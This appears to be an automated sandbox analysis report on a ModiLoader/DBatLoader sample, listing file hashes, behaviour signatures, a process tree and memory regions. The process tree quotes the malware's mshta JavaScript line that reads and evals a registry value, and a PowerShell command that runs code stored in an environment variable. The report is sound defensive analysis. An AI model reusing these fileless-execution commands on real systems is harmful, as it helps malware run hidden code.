Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-05-2024 10:21

General

  • Target

    3f01eb9b2443229c8afbb484a9e0ca69_JaffaCakes118.exe

  • Size

    356KB

  • MD5

    3f01eb9b2443229c8afbb484a9e0ca69

  • SHA1

    22229316344b4a36d52d7b23ee5aff7bfc7dc9fc

  • SHA256

    4ed1fe6848f4109e6a542a904a4dd692e99fcf19937468eb6eb7cc17db0bc3fa

  • SHA512

    67d7a31e3753f501f43f488286034b4d756398e07e03ce4e2cd96a6aa8e8777c897acd9ae47f7f6a947136cec8843cf92bce4f4a28e1b345c2b188dd06f4b28f

  • SSDEEP

    6144:smUdcds3QFSx8tWHTG7pYIGAKeBbCalBcDS00XxMOxz0hJGUKsvZVM5QiMtW:smlddw+MeBb5lBIPjOMJGOZV9E

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 9 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3f01eb9b2443229c8afbb484a9e0ca69_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\3f01eb9b2443229c8afbb484a9e0ca69_JaffaCakes118.exe"
    1⤵
      PID:3980
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:WIVM5="B4AnSOH";C2n4=new%20ActiveXObject("WScript.Shell");UjSQ0GrJ="SI";bFUR8=C2n4.RegRead("HKCU\\software\\l6p4ftruI\\ZLqEpJ2jK");r2OyP9="jhcLZ";eval(bFUR8);iecGf2="fOLX7";
      1⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3224
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:eacgczc
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1080

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p4fi1wth.nih.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1080-11-0x0000000003150000-0x0000000003186000-memory.dmp
      Filesize

      216KB

    • memory/1080-15-0x00000000063A0000-0x0000000006406000-memory.dmp
      Filesize

      408KB

    • memory/1080-28-0x00000000080D0000-0x000000000874A000-memory.dmp
      Filesize

      6.5MB

    • memory/1080-26-0x0000000006870000-0x000000000688E000-memory.dmp
      Filesize

      120KB

    • memory/1080-25-0x0000000006410000-0x0000000006764000-memory.dmp
      Filesize

      3.3MB

    • memory/1080-14-0x00000000062C0000-0x0000000006326000-memory.dmp
      Filesize

      408KB

    • memory/1080-13-0x0000000005AD0000-0x0000000005AF2000-memory.dmp
      Filesize

      136KB

    • memory/1080-12-0x0000000005C20000-0x0000000006248000-memory.dmp
      Filesize

      6.2MB

    • memory/1080-29-0x0000000006D90000-0x0000000006DAA000-memory.dmp
      Filesize

      104KB

    • memory/1080-27-0x0000000006890000-0x00000000068DC000-memory.dmp
      Filesize

      304KB

    • memory/3980-8-0x0000000002420000-0x00000000024FC000-memory.dmp
      Filesize

      880KB

    • memory/3980-4-0x0000000002420000-0x00000000024FC000-memory.dmp
      Filesize

      880KB

    • memory/3980-7-0x0000000002420000-0x00000000024FC000-memory.dmp
      Filesize

      880KB

    • memory/3980-2-0x0000000000400000-0x0000000000460710-memory.dmp
      Filesize

      385KB

    • memory/3980-1-0x0000000000457000-0x0000000000459000-memory.dmp
      Filesize

      8KB

    • memory/3980-5-0x0000000002420000-0x00000000024FC000-memory.dmp
      Filesize

      880KB

    • memory/3980-6-0x0000000002420000-0x00000000024FC000-memory.dmp
      Filesize

      880KB

    • memory/3980-0-0x0000000000400000-0x0000000000460710-memory.dmp
      Filesize

      385KB

    • memory/3980-3-0x0000000002420000-0x00000000024FC000-memory.dmp
      Filesize

      880KB

    • memory/3980-9-0x0000000002420000-0x00000000024FC000-memory.dmp
      Filesize

      880KB